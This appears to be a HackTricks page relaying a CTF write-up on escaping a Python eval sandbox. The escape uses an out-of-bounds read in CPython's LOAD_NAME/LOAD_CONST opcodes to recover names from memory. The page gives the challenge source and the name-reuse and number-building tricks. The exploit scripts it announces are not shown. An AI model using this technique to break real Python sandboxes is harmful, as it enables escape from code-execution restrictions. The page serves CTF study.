LOAD_NAME / LOAD_CONST opcode OOB Read
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
This info was taken from this writeup.
TL;DR
We can use OOB read feature in LOAD_NAME / LOAD_CONST opcode to get some symbol in the memory. Which means using trick like (a, b, c, ... hundreds of symbol ..., __getattribute__) if [] else [].__getattribute__(...) to get a symbol (such as function name) you want.
Then just craft your exploit.
Overview
The source code is pretty short, only contains 4 lines!
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))1234You can input arbitrary Python code, and it'll be compiled to a Python code object. However co_consts and co_names of that code object will be replaced with an empty tuple before eval that code object.
So in this way, all the expression contains consts (e.g. numbers, strings etc.) or names (e.g. variables, functions) might cause segmentation fault in the end.
Out of Bound Read
How does the segfault happen?
Let's start with a simple example, [a, b, c] could compile into the following bytecode.
But what if the co_names become empty tuple? The LOAD_NAME 2 opcode is still executed, and try to read value from that memory address it originally should be. Yes, this is an out-of-bound read "feature".
The core concept for the solution is simple. Some opcodes in CPython for example LOAD_NAME and LOAD_CONST are vulnerable (?) to OOB read.
They retrieve an object from index oparg from the consts or names tuple (that's what co_consts and co_names named under the hood). We can refer to the following short snippest about LOAD_CONST to see what CPython does when it proccesses to LOAD_CONST opcode.
In this way we can use the OOB feature to get a "name" from arbitrary memory offset. To make sure what name it has and what's it's offset, just keep trying LOAD_NAME 0, LOAD_NAME 1 ... LOAD_NAME 99 ... And you could find something in about oparg > 700. You can also try to use gdb to take a look at the memory layout of course, but I don't think it would be more easier?
Generating the Exploit
Once we retrieve those useful offsets for names / consts, how do we get a name / const from that offset and use it? Here is a trick for you:
Let's assume we can get a __getattribute__ name from offset 5 (LOAD_NAME 5) with co_names=(), then just do the following stuff:
Notice that it is not necessary to name it as
__getattribute__, you can name it as something shorter or more weird
You can understand the reason behind by just viewing it's bytecode:
Notice that LOAD_ATTR also retrieve the name from co_names. Python loads names from the same offset if the name is the same, so the second __getattribute__ is still loaded from offset=5. Using this feature we can use arbitrary name once the name is in the memory nearby.
For generating numbers should be trivial:
0: not [[]]
1: not []
2: (not []) + (not [])
...
Exploit Script
I didn't use consts due to the length limit.
First here is a script for us to find those offsets of names.
And the following is for generating the real Python exploit.
It basically does the following things, for those strings we get it from the __dir__ method:
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Last updated